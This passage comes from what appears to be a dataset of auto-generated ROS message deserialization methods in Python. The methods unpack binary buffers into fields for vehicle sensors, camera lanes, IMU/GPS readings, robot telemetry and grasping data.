length):\n val1 = nlink_parser.msg.LinktrackNode2()\n _x = val1\n start = end\n end += 14\n (_x.role, _x.id, _x.dis, _x.fp_rssi, _x.rx_rssi,) = _get_struct_2B3f().unpack(str[start:end])\n self.nodes.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.Hlines is None:\n self.Hlines = None\n if self.Vlines is None:\n self.Vlines = None\n if self.regions is None:\n self.regions = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 4\n (_x.image_width, _x.image_height,) = _get_struct_2H().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.Hlines = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Point()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.Hlines.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.Vlines = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Point()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.Vlines.append(val1)\n start = end\n end += 2\n (self.PFPS,) = _get_struct_H().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.regions = []\n for i in range(0, length):\n val1 = cooperative_driving_vision.msg.Region()\n _v7 = val1.color\n _x = _v7\n start = end\n end += 16\n (_x.r, _x.g, _x.b, _x.a,) = _get_struct_4f().unpack(str[start:end])\n _v8 = 
val1.moment\n _x = _v8\n start = end\n end += 40\n (_x.m00, _x.m10, _x.m01, _x.m11, _x.m20, _x.m02, _x.m21, _x.m12, _x.m30, _x.m03,) = _get_struct_10f().unpack(str[start:end])\n self.regions.append(val1)\n _x = self\n start = end\n end += 4\n (_x.box_width, _x.box_height,) = _get_struct_2H().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.position is None:\n self.position = pcl_segment.msg.positionRPY()\n end = 0\n _x = self\n start = end\n end += 57\n (_x.position.x, _x.position.y, _x.position.z, _x.position.roll, _x.position.pitch, _x.position.yaw, _x.position.stamp.secs, _x.position.stamp.nsecs, _x.is_Known,) = _get_struct_6d2IB().unpack(str[start:end])\n self.is_Known = bool(self.is_Known)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 142\n (_x.Timestamp_sec, _x.Timestamp_nsec, _x.Roll, _x.Pitch, _x.Yaw, _x.Wx, _x.Wy, _x.Wz, _x.AcelX, _x.AcelY, _x.AcelZ, _x.VelN, _x.VelE, _x.VelZ, _x.GPSLong, _x.GPSLat, _x.GPSAlt, _x.Temp, _x.IMUTime, _x.BITStatus,) = _get_struct_2i16dih().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 72\n (_x.lnid, _x.did, _x.blid, _x.flid, _x.bnid, _x.fnid, _x.jct, _x.blid2, _x.blid3, _x.blid4, _x.flid2, _x.flid3, _x.flid4, _x.clossid, _x.span, _x.lcnt, _x.lno,) = _struct_14id2i.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.localStamp is None:\n self.localStamp = vehicle_msgs.msg.FrameStamp()\n if self.globalStamp is None:\n self.globalStamp = vehicle_msgs.msg.FrameStamp()\n if self.camera is None:\n self.camera = vehicle_msgs.msg.Camera()\n if self.camera_obj is None:\n self.camera_obj = None\n if self.camera_lane is None:\n self.camera_lane = vehicle_msgs.msg.Camera_Lane()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 16\n (_x.messageID, _x.localStamp.header.seq, _x.localStamp.header.stamp.secs, _x.localStamp.header.stamp.nsecs,) = _get_struct_i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.localStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.localStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.localStamp.time, _x.localStamp.lat, _x.localStamp.lng, _x.localStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.localStamp.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.localStamp.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n 
end += 24\n self.localStamp.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.localStamp.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = self\n start = end\n end += 12\n (_x.globalStamp.header.seq, _x.globalStamp.header.stamp.secs, _x.globalStamp.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.globalStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.globalStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.globalStamp.time, _x.globalStamp.lat, _x.globalStamp.lng, _x.globalStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.globalStamp.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.globalStamp.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.globalStamp.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.globalStamp.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = self\n start = end\n end += 12\n (_x.camera.header.seq, _x.camera.header.stamp.secs, _x.camera.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 16\n (_x.camera.messageID, _x.camera.localStamp.header.seq, _x.camera.localStamp.header.stamp.secs, _x.camera.localStamp.header.stamp.nsecs,) = _get_struct_i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera.localStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera.localStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera.localStamp.time, _x.camera.localStamp.lat, _x.camera.localStamp.lng, _x.camera.localStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.localStamp.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera.localStamp.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera.localStamp.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera.localStamp.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = self\n start = end\n end += 12\n (_x.camera.globalStamp.header.seq, _x.camera.globalStamp.header.stamp.secs, _x.camera.globalStamp.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera.globalStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera.globalStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera.globalStamp.time, _x.camera.globalStamp.lat, _x.camera.globalStamp.lng, _x.camera.globalStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n 
end += 24\n self.camera.globalStamp.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera.globalStamp.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera.globalStamp.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera.globalStamp.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = self\n start = end\n end += 12\n (_x.camera.camera_numobstacles, _x.camera.VehSpeed,) = _get_struct_id().unpack(str[start:end])\n self.camera_obj = []\n for i in range(0, 10):\n val1 = vehicle_msgs.msg.Camera_Obj()\n _v25 = val1.header\n start = end\n end += 4\n (_v25.seq,) = _get_struct_I().unpack(str[start:end])\n _v26 = _v25.stamp\n _x = _v26\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v25.frame_id = str[start:end].decode('utf-8')\n else:\n _v25.frame_id = str[start:end]\n start = end\n end += 4\n (val1.messageID,) = _get_struct_i().unpack(str[start:end])\n _v27 = val1.localStamp\n _v28 = _v27.header\n start = end\n end += 4\n (_v28.seq,) = _get_struct_I().unpack(str[start:end])\n _v29 = _v28.stamp\n _x = _v29\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v28.frame_id = str[start:end].decode('utf-8')\n else:\n _v28.frame_id = str[start:end]\n _x = _v27\n start = end\n end += 32\n (_x.time, _x.lat, _x.lng, _x.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n _v27.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n _v27.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n _v27.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n _v27.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _v30 = val1.globalStamp\n _v31 = _v30.header\n start = end\n end += 4\n (_v31.seq,) = _get_struct_I().unpack(str[start:end])\n _v32 = _v31.stamp\n _x = _v32\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v31.frame_id = str[start:end].decode('utf-8')\n else:\n _v31.frame_id = str[start:end]\n _x = _v30\n start = end\n end += 32\n (_x.time, _x.lat, _x.lng, _x.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n _v30.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n _v30.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n _v30.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n _v30.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = val1\n start = end\n end += 136\n (_x.camera_obstacle_id, _x.camera_obstacleposx, _x.camera_obstacleposy, _x.blinkerInfo, _x.cut_in_and_out, _x.obstacle_type, _x.obstacle_status, _x.obstacle_valid, _x.obstacles_brake_lights, _x.obstacle_length, _x.obstacle_width, _x.obstacles_velx, 
_x.obstacleAge, _x.obstacleLane, _x.CIPVFlag, _x.RadarPosX, _x.RadarVelX, _x.RadarMatchConfidence, _x.MatcheRadarID, _x.obstacleAngleRate, _x.obstacles_velY, _x.object_Accel_X, _x.obstacleReplaced, _x.obstacleAngle,) = _get_struct_i2d6i3d3i2d2ididid().unpack(str[start:end])\n self.camera_obj.append(val1)\n _x = self\n start = end\n end += 12\n (_x.camera_lane.header.seq, _x.camera_lane.header.stamp.secs, _x.camera_lane.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_lane.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera_lane.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 16\n (_x.camera_lane.messageID, _x.camera_lane.localStamp.header.seq, _x.camera_lane.localStamp.header.stamp.secs, _x.camera_lane.localStamp.header.stamp.nsecs,) = _get_struct_i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_lane.localStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera_lane.localStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera_lane.localStamp.time, _x.camera_lane.localStamp.lat, _x.camera_lane.localStamp.lng, _x.camera_lane.localStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.localStamp.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera_lane.localStamp.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera_lane.localStamp.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera_lane.localStamp.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = self\n start = end\n end += 12\n (_x.camera_lane.globalStamp.header.seq, _x.camera_lane.globalStamp.header.stamp.secs, _x.camera_lane.globalStamp.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_lane.globalStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera_lane.globalStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera_lane.globalStamp.time, _x.camera_lane.globalStamp.lat, _x.camera_lane.globalStamp.lng, _x.camera_lane.globalStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.globalStamp.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera_lane.globalStamp.orientation = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera_lane.globalStamp.linearSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.camera_lane.globalStamp.angularSpeed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = self\n start = end\n end += 404\n (_x.camera_lane.l_numoflaneline, _x.camera_lane.l_lanelineid, _x.camera_lane.l_lanepositon, _x.camera_lane.l_lanecurvature, _x.camera_lane.l_lanecurvaturederivative, _x.camera_lane.l_lane_type, _x.camera_lane.l_heading_angle, _x.camera_lane.l_lane_mark_color, _x.camera_lane.l_laneQuality, 
_x.camera_lane.l_laneWidthMarking, _x.camera_lane.l_laneViewRangStart, _x.camera_lane.l_laneViewRangEnd, _x.camera_lane.l_laneCrossing, _x.camera_lane.l_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.l_lanePRED_OTHER_SIDE, _x.camera_lane.l_lanePRED_OVERRIDE, _x.camera_lane.l_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.l_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.l_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.l_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.l_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.l_lanePRED_SOURCE_STD, _x.camera_lane.l_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.l_laneTCL, _x.camera_lane.r_numoflaneline, _x.camera_lane.r_lanelineid, _x.camera_lane.r_lanepositon, _x.camera_lane.r_lanecurvature, _x.camera_lane.r_lanecurvaturederivative, _x.camera_lane.r_lane_type, _x.camera_lane.r_heading_angle, _x.camera_lane.r_lane_mark_color, _x.camera_lane.r_laneQuality, _x.camera_lane.r_laneWidthMarking, _x.camera_lane.r_laneViewRangStart, _x.camera_lane.r_laneViewRangEnd, _x.camera_lane.r_laneCrossing, _x.camera_lane.r_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.r_lanePRED_OTHER_SIDE, _x.camera_lane.r_lanePRED_OVERRIDE, _x.camera_lane.r_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.r_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.r_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.r_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.r_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.r_lanePRED_SOURCE_STD, _x.camera_lane.r_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.r_laneTCL, _x.camera_lane.next_l_laneViewRangStart, _x.camera_lane.next_l_laneViewRangEnd, _x.camera_lane.next_l_numoflaneline, _x.camera_lane.next_l_lanelineid, _x.camera_lane.next_l_lanepositon, _x.camera_lane.next_l_lanecurvature, _x.camera_lane.next_l_lanecurvaturederivative, _x.camera_lane.next_l_lane_type, _x.camera_lane.next_l_heading_angle, _x.camera_lane.next_l_lane_mark_color, _x.camera_lane.next_l_laneQuality, _x.camera_lane.next_l_laneWidthMarking, _x.camera_lane.next_r_laneViewRangStart, _x.camera_lane.next_r_laneViewRangEnd, _x.camera_lane.next_r_numoflaneline, _x.camera_lane.next_r_lanelineid, _x.camera_lane.next_r_lanepositon, _x.camera_lane.next_r_lanecurvature, _x.camera_lane.next_r_lanecurvaturederivative, _x.camera_lane.next_r_lane_type, _x.camera_lane.next_r_heading_angle, _x.camera_lane.next_r_lane_mark_color, _x.camera_lane.next_r_laneQuality, _x.camera_lane.next_r_laneWidthMarking, _x.camera_lane.highwayConstructionArea, _x.camera_lane.highwayRoadType, _x.camera_lane.highwayHighwayExitRight, _x.camera_lane.highwayHighwayExitLeft, _x.camera_lane.highwayProbabilityLeftLane, _x.camera_lane.highwayProbabilityRightLane, _x.camera_lane.highwayDriving_peed_left_lane, _x.camera_lane.highwayDriving_peed_right_lane, _x.camera_lane.highwayprotocol_version,) = _get_struct_2i3did19i3did21i3did7i3did7i4di().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x 
= self\n start = end\n end += 32\n (_x.distance_front, _x.angle_front, _x.distance_back, _x.angle_back, _x.turn_left,) = _struct_didid.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.turn_left_sensor = str[start:end]\n start = end\n end += 8\n (self.turn_right,) = _struct_d.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.turn_right_sensor = str[start:end]\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg._Header.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 51\n (_x.temp_1_curr, _x.temp_1_min, _x.temp_1_max, _x.temp_2_curr, _x.temp_2_min, _x.temp_2_max, _x.temp_3_curr, _x.temp_3_min, _x.temp_3_max, _x.temp_4_curr, _x.temp_4_min, _x.temp_4_max, _x.temp_5_curr, _x.temp_5_min, _x.temp_5_max, _x.temp_6_curr, _x.temp_6_min, _x.temp_6_max, _x.akku_voltage_curr, _x.akku_voltage_min, _x.akku_voltage_max, _x.hals_motor_voltage_curr, _x.hals_motor_voltage_min, _x.hals_motor_voltage_max, _x.hals_logik_voltage_curr, _x.hals_logik_voltage_min, _x.hals_logik_voltage_max, _x.tablett_logik_voltage_curr, _x.tablett_logik_voltage_min, _x.tablett_logik_voltage_max, _x.arm_logik_voltage_curr, _x.arm_logik_voltage_min, _x.arm_logik_voltage_max, _x.tablett_motor_voltage_curr, _x.tablett_motor_voltage_min, _x.tablett_motor_voltage_max, _x.hals_motor_current_curr, _x.hals_motor_current_min, _x.hals_motor_current_max, _x.hals_logik_current_curr, _x.hals_logik_current_min, _x.hals_logik_current_max, _x.tablett_logik_current_curr, _x.tablett_logik_current_min, _x.tablett_logik_current_max, _x.arm_logik_current_curr, _x.arm_logik_current_min, _x.arm_logik_current_max, _x.tablett_motor_current_curr, _x.tablett_motor_current_min, _x.tablett_motor_current_max,) = _struct_51B.unpack(str[start:end])\n return self\n except struct.error, e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.graspable_objects is None:\n self.graspable_objects = None\n if self.image is None:\n self.image = sensor_msgs.msg.Image()\n if self.camera_info is None:\n self.camera_info = sensor_msgs.msg.CameraInfo()\n if self.meshes is None:\n self.meshes = None\n if self.reference_to_camera is None:\n self.reference_to_camera = geometry_msgs.msg.Pose()\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.graspable_objects = []\n for i in range(0, length):\n val1 = manipulation_msgs.msg.GraspableObject()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.reference_frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.reference_frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.potential_models = []\n for i in range(0, length):\n val2 = household_objects_database_msgs.msg.DatabaseModelPose()\n start = 
end\n end += 4\n (val2.model_id,) = _get_struct_i().unpack(str[start:end])\n _v94 = val2.type\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v94.key = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v94.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v94.db = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v94.db = str[start:end]\n _v95 = val2.pose\n _v96 = _v95.header\n start = end\n end += 4\n (_v96.seq,) = _get_struct_I().unpack(str[start:end])\n _v97 = _v96.stamp\n _x = _v97\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v96.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v96.frame_id = str[start:end]\n _v98 = _v95.pose\n _v99 = _v98.position\n _x = _v99\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n _v100 = _v98.orientation\n _x = _v100\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 4\n (val2.confidence,) = _get_struct_f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.detector_name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val2.detector_name = str[start:end]\n val1.potential_models.append(val2)\n _v101 = val1.cluster\n _v102 = _v101.header\n start = end\n end += 4\n (_v102.seq,) = _get_struct_I().unpack(str[start:end])\n _v103 = _v102.stamp\n _x = _v103\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v102.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v102.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v101.points = []\n for i in range(0, length):\n val3 = geometry_msgs.msg.Point32()\n _x = val3\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _get_struct_3f().unpack(str[start:end])\n _v101.points.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v101.channels = []\n for i in range(0, length):\n val3 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val3.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n val3.values = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n _v101.channels.append(val3)\n _v104 = val1.region\n _v105 = _v104.cloud\n _v106 = _v105.header\n start = end\n end += 4\n (_v106.seq,) = _get_struct_I().unpack(str[start:end])\n _v107 = _v106.stamp\n _x = _v107\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v106.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v106.frame_id = str[start:end]\n _x = _v105\n start = end\n end += 8\n (_x.height, _x.width,) = 
_get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v105.fields = []\n for i in range(0, length):\n val4 = sensor_msgs.msg.PointField()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val4.name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val4.name = str[start:end]\n _x = val4\n start = end\n end += 9\n (_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])\n _v105.fields.append(val4)\n _x = _v105\n start = end\n end += 9\n (_x.is_bigendian, _x.point_step, _x.row_step,) = _get_struct_B2I().unpack(str[start:end])\n _v105.is_bigendian = bool(_v105.is_bigendian)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v105.data = str[start:end]\n start = end\n end += 1\n (_v105.is_dense,) = _get_struct_B().unpack(str[start:end])\n _v105.is_dense = bool(_v105.is_dense)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n _v104.mask = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n _v108 = _v104.image\n _v109 = _v108.header\n start = end\n end += 4\n (_v109.seq,) = _get_struct_I().unpack(str[start:end])\n _v110 = _v109.stamp\n _x = _v110\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v109.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v109.frame_id = str[start:end]\n _x = _v108\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v108.encoding = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v108.encoding = str[start:end]\n _x = _v108\n start = end\n end += 5\n (_x.is_bigendian, _x.step,) = _get_struct_BI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v108.data = str[start:end]\n _v111 = _v104.disparity_image\n _v112 = _v111.header\n start = end\n end += 4\n (_v112.seq,) = _get_struct_I().unpack(str[start:end])\n _v113 = _v112.stamp\n _x = _v113\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v112.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v112.frame_id = str[start:end]\n _x = _v111\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n 